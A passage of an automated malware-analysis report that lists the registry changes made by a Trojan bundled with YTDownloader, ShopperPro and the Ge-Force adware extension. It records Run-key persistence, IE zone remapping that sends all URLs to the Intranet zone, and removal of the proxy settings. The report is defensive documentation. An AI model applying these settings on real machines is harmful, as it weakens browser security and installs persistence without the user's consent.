"Common Programs" = "%Documents and Settings%\All Users\Start Menu\Programs"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Desktop" = "%Documents and Settings%\%current user%\Desktop"
"Programs" = "%Documents and Settings%\%current user%\Start Menu\Programs"
"Favorites" = "%Documents and Settings%\%current user%\Favorites"

The process setup.exe:3084 makes changes in the system registry.
The Trojan creates and/or sets the following values in system registry:

[HKCR\TypeLib\{82351433-9094-11D1-A24B-00A0C932C7DF}\1.5]
"(Default)" = "Animation GIF Control"

[HKLM\SOFTWARE\YTDownloader\Video Converter]
"ExeLocation" = "%Program Files%\YTDownloader\Converter.exe"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path2]
"CacheLimit" = "65452"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Common Start Menu" = "%Documents and Settings%\All Users\Start Menu"

[HKCR\AniGIFPpg.AniGIFPpg]
"(Default)" = "AniGIFPpg Class"

[HKCR\Interface\{82351440-9094-11D1-A24B-00A0C932C7DF}]
"(Default)" = "IAniGIF"

[HKCR\CLSID\{61AB12E1-A5FF-11D1-B2E9-444553540000}\InprocServer32]
"(Default)" = "%Program Files%\YTDownloader\AniGIF.ocx"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Startup" = "%Documents and Settings%\%current user%\Start Menu\Programs\Startup"

[HKCR\AniGIFCtrl.AniGIF\CurVer]
"(Default)" = "AniGIFCtrl.AniGIF"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{c155cd75-744b-11e2-8294-806d6172696f}]
"BaseClass" = "Drive"

[HKLM\SOFTWARE\YTDownloader]
"ExeLocation" = "%Program Files%\YTDownloader\YTDownloader.exe"
"Version" = "1.0.8654.1189"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Common Templates" = "%Documents and Settings%\All Users\Templates"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Start Menu" = "%Documents and Settings%\%current user%\Start Menu"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Connections]
"SavedLegacySettings" = "3C 00 00 00 27 00 00 00 01 00 00 00 00 00 00 00"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"My Music" = "%Documents and Settings%\%current user%\My Documents\My Music"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings]
"MigrateProxy" = "1"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Desktop" = "%Documents and Settings%\%current user%\Desktop"

[HKCR\CLSID\{82351441-9094-11D1-A24B-00A0C932C7DF}\InprocServer32]
"(Default)" = "%Program Files%\YTDownloader\AniGIF.ocx"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths]
"Paths" = "4"

[HKCR\CLSID\{82351441-9094-11D1-A24B-00A0C932C7DF}\InprocServer32]
"ThreadingModel" = "Apartment"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"History" = "%Documents and Settings%\%current user%\Local Settings\History"

[HKCR\CLSID\{82351441-9094-11D1-A24B-00A0C932C7DF}]
"(Default)" = "Animation GIF Control"

[HKLM\SOFTWARE\YTDownloader\Video Converter]
"FFUseConverter" = "1"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Programs" = "%Documents and Settings%\%current user%\Start Menu\Programs"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths]
"Directory" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5"

[HKCR\CLSID\{82351441-9094-11D1-A24B-00A0C932C7DF}\ToolboxBitmap32]
"(Default)" = "%Program Files%\YTDownloader\AniGIF.ocx, 1"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{b98117e8-75ca-11e2-81b2-000c293708fb}]
"BaseClass" = "Drive"

[HKCR\AniGIFPpg2.AniGIFPpg2.1]
"(Default)" = "AniGIFPpg2 Class"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Personal" = "%Documents and Settings%\%current user%\My Documents"
"Cookies" = "%Documents and Settings%\%current user%\Cookies"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path2]
"CachePath" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\Cache2"

[HKCU\Software\YTDownloader]
"Aff" = "obrdc1_0_0_0_0,99999999-9999-4996-b722-50633741fbe4,"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Common Desktop" = "%Documents and Settings%\All Users\Desktop"
"Common Startup" = "%Documents and Settings%\All Users\Start Menu\Programs\Startup"

[HKCR\AniGIFCtrl.AniGIF]
"(Default)" = "Animation GIF Control"

[HKCR\AniGIFPpg.AniGIFPpg.1]
"(Default)" = "AniGIFPpg Class"

[HKCR\Interface\{82351440-9094-11D1-A24B-00A0C932C7DF}\TypeLib]
"Version" = "1.5"
"(Default)" = "{82351433-9094-11D1-A24B-00A0C932C7DF}"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"CommonVideo" = "%Documents and Settings%\All Users\Documents\My Videos"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path1]
"CacheLimit" = "65452"

[HKLM\SOFTWARE\YTDownloader]
"Aff" = "obrdc1_0_0_0_0,99999999-9999-4996-b722-50633741fbe4,"

[HKCR\AniGIFPpg.AniGIFPpg.1\CLSID]
"(Default)" = "{6DC82D15-92F2-11D1-A255-00A0C932C7DF}"

[HKCR\TypeLib\{82351433-9094-11D1-A24B-00A0C932C7DF}\1.5\0\win32]
"(Default)" = "%Program Files%\YTDownloader\AniGIF.ocx"

[HKLM\SOFTWARE\Microsoft\Cryptography\RNG]
"Seed" = "9E CF 20 AD FF 2A 49 99 2A 08 EE 0F D1 97 44 BC"

[HKCR\Interface\{5252AC41-94BB-11D1-B2E7-444553540000}\TypeLib]
"(Default)" = "{82351433-9094-11D1-A24B-00A0C932C7DF}"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{c155cd72-744b-11e2-8294-806d6172696f}]
"BaseClass" = "Drive"

[HKLM\SOFTWARE\YTDownloader\Video Converter]
"Install" = "%Program Files%\YTDownloader\"

[HKCR\AniGIFPpg2.AniGIFPpg2.1\CLSID]
"(Default)" = "{61AB12E1-A5FF-11D1-B2E9-444553540000}"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Favorites" = "%Documents and Settings%\%current user%\Favorites"

[HKCR\CLSID\{82351441-9094-11D1-A24B-00A0C932C7DF}\Verb\0]
"(Default)" = "&Properties,0,2"

[HKCR\Interface\{5252AC41-94BB-11D1-B2E7-444553540000}\TypeLib]
"Version" = "1.5"

[HKCR\CLSID\{82351441-9094-11D1-A24B-00A0C932C7DF}\MiscStatus]
"(Default)" = "0"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path4]
"CacheLimit" = "65452"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"AppData" = "%Documents and Settings%\%current user%\Application Data"

[HKCR\Interface\{82351440-9094-11D1-A24B-00A0C932C7DF}\ProxyStubClsid32]
"(Default)" = "{00020424-0000-0000-C000-000000000046}"

[HKCR\AniGIFPpg.AniGIFPpg\CurVer]
"(Default)" = "AniGIFPpg.AniGIFPpg.1"

[HKCR\TypeLib\{82351433-9094-11D1-A24B-00A0C932C7DF}\1.5\FLAGS]
"(Default)" = "2"

[HKCU\Software\YTDownloader]
"Version" = "1.0.8654.1189"

[HKCU\Software\Microsoft\Windows\ShellNoRoam\MUICache\%System%]
"net.exe" = "Net Command"

[HKCR\AniGIFPpg2.AniGIFPpg2\CurVer]
"(Default)" = "AniGIFPpg2.AniGIFPpg2.1"

[HKLM\System\CurrentControlSet\Hardware Profiles\0001\Software\Microsoft\windows\CurrentVersion\Internet Settings]
"ProxyEnable" = "0"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"CommonMusic" = "%Documents and Settings%\All Users\Documents\My Music"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path1]
"CachePath" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\Cache1"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path3]
"CacheLimit" = "65452"

[HKCR\CLSID\{82351441-9094-11D1-A24B-00A0C932C7DF}\TypeLib]
"(Default)" = "{82351433-9094-11D1-A24B-00A0C932C7DF}"

[HKCR\CLSID\{82351441-9094-11D1-A24B-00A0C932C7DF}\MiscStatus\1]
"(Default)" = "131473"

[HKCR\CLSID\{6DC82D15-92F2-11D1-A255-00A0C932C7DF}\InprocServer32]
"ThreadingModel" = "Apartment"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Common Favorites" = "%Documents and Settings%\All Users\Favorites"

[HKCR\AniGIFPpg2.AniGIFPpg2]
"(Default)" = "AniGIFPpg2 Class"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"My Video" = ""

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path4]
"CachePath" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\Cache4"

[HKCR\AniGIFCtrl.AniGIF\CLSID]
"(Default)" = "{82351441-9094-11D1-A24B-00A0C932C7DF}"

[HKCR\CLSID\{61AB12E1-A5FF-11D1-B2E9-444553540000}\InprocServer32]
"ThreadingModel" = "Apartment"

[HKCR\Interface\{5252AC41-94BB-11D1-B2E7-444553540000}]
"(Default)" = "IAniGIFEvents"

[HKCR\Interface\{5252AC41-94BB-11D1-B2E7-444553540000}\ProxyStubClsid]
"(Default)" = "{00020420-0000-0000-C000-000000000046}"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{c155cd73-744b-11e2-8294-806d6172696f}]
"BaseClass" = "Drive"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Local AppData" = "%Documents and Settings%\%current user%\Local Settings\Application Data"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Common AppData" = "%Documents and Settings%\All Users\Application Data"

[HKCR\Interface\{82351440-9094-11D1-A24B-00A0C932C7DF}\ProxyStubClsid]
"(Default)" = "{00020424-0000-0000-C000-000000000046}"

[HKCR\Interface\{5252AC41-94BB-11D1-B2E7-444553540000}\ProxyStubClsid32]
"(Default)" = "{00020420-0000-0000-C000-000000000046}"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"My Pictures" = "%Documents and Settings%\%current user%\My Documents\My Pictures"
"Templates" = "%Documents and Settings%\%current user%\Templates"
"Cache" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files"

[HKCR\CLSID\{82351441-9094-11D1-A24B-00A0C932C7DF}\ProgID]
"(Default)" = "AniGIFCtrl.AniGIF"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Common Documents" = "%Documents and Settings%\All Users\Documents"

[HKCR\CLSID\{61AB12E1-A5FF-11D1-B2E9-444553540000}]
"(Default)" = "AniGIFPpg2 Class"

[HKCR\CLSID\{82351441-9094-11D1-A24B-00A0C932C7DF}\Version]
"(Default)" = "1.5"

[HKCR\CLSID\{82351441-9094-11D1-A24B-00A0C932C7DF}\Verb]
"(Default)" = ""

[HKCR\CLSID\{6DC82D15-92F2-11D1-A255-00A0C932C7DF}]
"(Default)" = "AniGIFPpg Class"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"CommonPictures" = "%Documents and Settings%\All Users\Documents\My Pictures"
"Common Programs" = "%Documents and Settings%\All Users\Start Menu\Programs"

[HKCR\CLSID\{6DC82D15-92F2-11D1-A255-00A0C932C7DF}\InprocServer32]
"(Default)" = "%Program Files%\YTDownloader\AniGIF.ocx"

[HKCU\Software\Microsoft\Windows\ShellNoRoam\MUICache]
"LangID" = "09 04"

[HKCR\AniGIFCtrl.AniGIF\Insertable]
"(Default)" = ""

[HKCU\Software\Microsoft\Windows\ShellNoRoam\MUICache\%System%]
"sc.exe" = "A tool to aid in developing services for WindowsNT"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path3]
"CachePath" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\Cache3"

[HKCR\TypeLib\{82351433-9094-11D1-A24B-00A0C932C7DF}\1.5\HELPDIR]
"(Default)" = "%Program Files%\YTDownloader\"

The Trojan modifies IE settings for security zones to map all URLs to the Intranet Zone:

[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap]
"IntranetName" = "1"

To automatically run itself each time Windows is booted, the Trojan adds the following link to its file to the system registry autorun key:

[HKCU\Software\Microsoft\Windows\CurrentVersion\Run]
"YTDownloader" = "%Program Files%\YTDownloader\YTDownloader.exe /boot"

Proxy settings are disabled:

[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings]
"ProxyEnable" = "0"

To automatically run itself each time Windows is booted, the Trojan adds the following link to its file to the system registry autorun key:

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Run]
"YTDownloader" = "%Program Files%\YTDownloader\YTDownloader.exe /boot"

The Trojan modifies IE settings for security zones to map all local web-nodes with no dots which do not refer to any zone to the Intranet Zone:

[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap]
"UNCAsIntranet" = "1"

The Trojan modifies IE settings for security zones to map all web-nodes that bypass the proxy to the Intranet Zone:

[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap]
"ProxyBypass" = "1"

The Trojan deletes the following registry key(s):

[HKCR\CLSID\{82351441-9094-11D1-A24B-00A0C932C7DF}\Programmable]

The Trojan deletes the following value(s) in system registry:

[HKCU\Software\Microsoft\Windows\ShellNoRoam\MUICache\C:\DOCUME~1\"%CurrentUserName%"\LOCALS~1\Temp\nsj6.tmp]
"setup.exe"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings]
"ProxyOverride"
"ProxyServer"

[HKCU\Software\Microsoft\Windows\ShellNoRoam\MUICache\C:\Perl\bin]
"perl.exe"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings]
"AutoConfigURL"
"MaxConnectionsPerServer"
"MaxConnectionsPer1_0Server"

The process setup.exe:3256 makes changes in the system registry.
The Trojan creates and/or sets the following values in system registry:

[HKLM\SOFTWARE\Microsoft\Cryptography\RNG]
"Seed" = "C7 92 56 3F 2B A0 D6 BB DF 2F 2D 04 B7 59 BE 7B"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{c155cd73-744b-11e2-8294-806d6172696f}]
"BaseClass" = "Drive"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\ShopperPro]
"UninstallString" = "%Program Files%\ShopperPro\SPremove.exe"
"DisplayIcon" = "%Program Files%\ShopperPro\ShopperPro.exe"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{c155cd72-744b-11e2-8294-806d6172696f}]
"BaseClass" = "Drive"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{b98117e8-75ca-11e2-81b2-000c293708fb}]
"BaseClass" = "Drive"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\ShopperPro]
"DisplayName" = "Shopper-Pro"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{c155cd75-744b-11e2-8294-806d6172696f}]
"BaseClass" = "Drive"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\App Paths\ShopperPro.exe]
"(Default)" = "%Program Files%\ShopperPro\ShopperPro.exe"

[HKLM\System\CurrentControlSet\Control\Session Manager]
"PendingFileRenameOperations" = "\??\C:\DOCUME~1\"%CurrentUserName%"\LOCALS~1\Temp\nsb9.tmp\AccDownload.dll,"

The process Smskc.exe:3904 makes changes in the system registry.
The Trojan creates and/or sets the following values in system registry:

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\Ge-Force]
"UninstallString" = "%Program Files%\Ge-Force\Uninstall.exe /fcp=1"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths]
"Directory" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path4]
"CacheLimit" = "65452"
"CachePath" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\Cache4"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Connections]
"SavedLegacySettings" = "3C 00 00 00 26 00 00 00 01 00 00 00 00 00 00 00"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"AppData" = "%Documents and Settings%\%current user%\Application Data"

[HKLM\SOFTWARE\Tempo]
"(Default)" = "tempo"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Personal" = "%Documents and Settings%\%current user%\My Documents"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{c155cd73-744b-11e2-8294-806d6172696f}]
"BaseClass" = "Drive"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Cookies" = "%Documents and Settings%\%current user%\Cookies"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path2]
"CachePath" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\Cache2"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\Ge-Force]
"DisplayName" = "Ge-Force"

[HKCU\Software\InstalledBrowserExtensions\21836]
"70881" = "Ge-Force"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Common AppData" = "%Documents and Settings%\All Users\Application Data"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{c155cd75-744b-11e2-8294-806d6172696f}]
"BaseClass" = "Drive"

[HKCU\Software\Crossrider]
"Verifier" = "34c14ee3961e02fd387be62f2fca6484"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\Ge-Force]
"CrAppId" = "70881"
"DisplayVersion" = "1.36.01.22"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Cache" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\Ge-Force]
"CrPublisherId" = "21836"

[HKLM\System\CurrentControlSet\Hardware Profiles\0001\Software\Microsoft\windows\CurrentVersion\Internet Settings]
"ProxyEnable" = "0"

[HKCU\Software\InstalledBrowserExtensions\21836\Status]
"Installed" = "1"

[HKLM\SOFTWARE\InstalledBrowserExtensions\21836\Status]
"Installed" = "1"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path1]
"CacheLimit" = "65452"

[HKCU\Software\InstalledBrowserExtensions\Webar]
"70881" = "Ge-Force"

[HKLM\SOFTWARE\Crossrider]
"Bic" = "27f49072ae5d263f87bcaf276b0be0c9IE"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\Ge-Force]
"DisplayIcon" = "%Program Files%\Ge-Force\utils.exe"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path2]
"CacheLimit" = "65452"

[HKCU\Software\Crossrider]
"Bic" = "27f49072ae5d263f87bcaf276b0be0c9IE"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Local AppData" = "%Documents and Settings%\%current user%\Local Settings\Application Data"

[HKLM\SOFTWARE\Microsoft\Cryptography\RNG]
"Seed" = "A1 65 67 4B 87 F8 13 E0 D2 72 9D DB E9 10 61 43"

[HKLM\SOFTWARE\Crossrider]
"Verifier" = "34c14ee3961e02fd387be62f2fca6484"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path1]
"CachePath" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\Cache1"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path3]
"CacheLimit" = "65452"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings]
"MigrateProxy" = "1"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{c155cd72-744b-11e2-8294-806d6172696f}]
"BaseClass" = "Drive"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{b98117e8-75ca-11e2-81b2-000c293708fb}]
"BaseClass" = "Drive"

[HKLM\SOFTWARE\InstalledBrowserExtensions\21836]
"70881" = "Ge-Force"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path3]
"CachePath" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\Cache3"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths]
"Paths" = "4"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\Ge-Force]
"Publisher" = "Webar"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"History" = "%Documents and Settings%\%current user%\Local Settings\History"

The Trojan modifies IE settings for security zones to map all local web-nodes with no dots which do not refer to any zone to the Intranet Zone:

[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap]
"UNCAsIntranet" = "1"

The Trojan modifies IE settings for security zones to map all web-nodes that bypass the proxy to the Intranet Zone:

[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap]
"ProxyBypass" = "1"

Proxy settings are disabled:

[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings]
"ProxyEnable" = "0"

The Trojan modifies IE settings for security zones to map all URLs to the Intranet Zone:

[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap]
"IntranetName" = "1"

The Trojan deletes the following registry key(s):

[HKLM\SOFTWARE\Tempo]

The Trojan deletes the following value(s) in system registry:

[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings]
"AutoConfigURL"
"ProxyServer"
"ProxyOverride"

The process net1.exe:3800 makes changes in the system registry.
The Trojan creates and/or sets the following values in system registry:

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Common Favorites" = "%Documents and Settings%\All Users\Favorites"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"My Video" = ""
"AppData" = "%Documents and Settings%\%current user%\Application Data"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Common Start Menu" = "%Documents and Settings%\All Users\Start Menu"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Personal" = "%Documents and Settings%\%current user%\My Documents"
"Cookies" = "%Documents and Settings%\%current user%\Cookies"
"Startup" = "%Documents and Settings%\%current user%\Start Menu\Programs\Startup"
"Local AppData" = "%Documents and Settings%\%current user%\Local Settings\Application Data"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Common AppData" = "%Documents and Settings%\All Users\Application Data"
"CommonMusic" = "%Documents and Settings%\All Users\Documents\My Music"
"Common Desktop" = "%Documents and Settings%\All Users\Desktop"
"Common Startup" = "%Documents and Settings%\All Users\Start Menu\Programs\Startup"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Templates" = "%Documents and Settings%\%current user%\Templates"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Common Documents" = "%Documents and Settings%\All Users\Documents"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"My Pictures" = "%Documents and Settings%\%current user%\My Documents\My Pictures"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Common Templates" = "%Documents and Settings%\All Users\Templates"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Start Menu" = "%Documents and Settings%\%current user%\Start Menu"
"My Music" = "%Documents and Settings%\%current user%\My Documents\My Music"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"CommonVideo" = "%Documents and Settings%\All Users\Documents\My Videos"
"CommonPictures" = "%Documents and Settings%\All Users\Documents\My Pictures"

[HKLM\SOFTWARE\Microsoft\Cryptography\RNG]
"Seed" = "BB B9 D6 AC A6 18 43 A9 DA 00 42 C1 DF 9D 5E 78"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Common Programs" = "%Documents and Settings%\All Users\Start Menu\Programs"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Desktop" = "%Documents and Settings%\%current user%\Desktop"
"Programs" = "%Documents and Settings%\%current user%\Start Menu\Programs"
"Favorites" = "%Documents and Settings%\%current user%\Favorites"

The process net1.exe:2732 makes changes in the system registry.
The Trojan creates and/or sets the following values in system registry:

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Common Favorites" = "%Documents and Settings%\All Users\Favorites"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"My Video" = ""
"AppData" = "%Documents and Settings%\%current user%\Application Data"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Common Start Menu" = "%Documents and Settings%\All Users\Start Menu"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Personal" = "%Documents and Settings%\%current user%\My Documents"
"Cookies" = "%Documents and Settings%\%current user%\Cookies"
"Startup" = "%Documents and Settings%\%current user%\Start Menu\Programs\Startup"
"Local AppData" = "%Documents and Settings%\%current user%\Local Settings\Application Data"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Common AppData" = "%Documents and Settings%\All Users\Application Data"
"CommonMusic" = "%Documents and Settings%\All Users\Documents\My Music"
"Common Desktop" = "%Documents and Settings%\All Users\Desktop"
"Common Startup" = "%Documents and Settings%\All Users\Start Menu\Programs\Startup"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Templates" = "%Documents and Settings%\%current user%\Templates"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Common Documents" = "%Documents and Settings%\All Users\Documents"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"My Pictures" = "%Documents and Settings%\%current user%\My Documents\My Pictures"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Common Templates" = "%Documents and Settings%\All Users\Templates"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Start Menu" = "%Documents and Settings%\%current user%\Start Menu"
"My Music" = "%Documents and Settings%\%current user%\My Documents\My Music"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"CommonVideo" = "%Documents and Settings%\All Users\Documents\My Videos"
"CommonPictures" = "%Documents and Settings%\All Users\Documents\My Pictures"

[HKLM\SOFTWARE\Microsoft\Cryptography\RNG]
"Seed" = "D6 D8 6D 60 0F CF E2 3D 1F 1E 5A FC 6C 3E FE E1"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Common Programs" = "%Documents and Settings%\All Users\Start Menu\Programs"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Desktop" = "%Documents and Settings%\%current user%\Desktop"
"Programs" = "%Documents and Settings%\%current user%\Start Menu\Programs"
"Favorites" = "%Documents and Settings%\%current user%\Favorites"

The process tcpsvcs.exe:756 makes changes in the system registry.
The Trojan creates and/or sets the following values in system registry:

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Common Favorites" = "%Documents and Settings%\All Users\Favorites"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{c155cd72-744b-11e2-8294-806d6172696f}]
"BaseClass" = "Drive"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"My Video" = ""
"AppData" = "%Documents and Settings%\%current user%\Application Data"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Common Start Menu" = "%Documents and Settings%\All Users\Start Menu"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Personal" = "%Documents and Settings%\%current user%\My Documents"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{c155cd73-744b-11e2-8294-806d6172696f}]
"BaseClass" = "Drive"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Cookies" = "%Documents and Settings%\%current user%\Cookies"
